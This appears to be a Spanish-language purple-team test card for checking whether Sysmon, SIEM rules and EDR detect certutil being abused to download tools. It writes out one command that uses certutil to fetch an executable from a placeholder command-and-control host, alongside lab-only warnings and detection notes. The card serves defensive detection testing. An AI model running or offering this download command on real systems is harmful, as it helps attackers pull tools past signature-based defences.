Certutil download test

certutil -urlcache -f http://<c2>/file.exe out.exe

Descarga un fichero con certutil en el host de pruebas, validando la detección del abuso del binario legítimo para transferir herramientas.

Ejecútalo en el laboratorio de purple team cuando quieras validar la detección de la transferencia de herramientas por certutil: el comando descarga el payload con el binario legítimo de Windows (el LOLBAS clásico) y el equipo verifica qué detectó — Sysmon Event 1 (certutil con -urlcache), las reglas del SIEM (certutil descargando), el EDR. Es la validación del living off the land en la transferencia: la herramienta legítima que las firmas no ven. En el purple teaming, certutil valida la capa de comportamiento de la descarga de herramientas.

No lo ejecutes fuera del laboratorio: la descarga genera el tráfico real — el host de pruebas es el sitio. Y ojo: certutil es legítimo — la detección se basa en los argumentos (el -urlcache -f con la URL) y en el contexto; la validación mide esas capas. El uso legítimo de certutil (la gestión de certificados) genera falsos positivos: la regla validada es la de los argumentos de descarga. La limpieza del fichero descargado al terminar.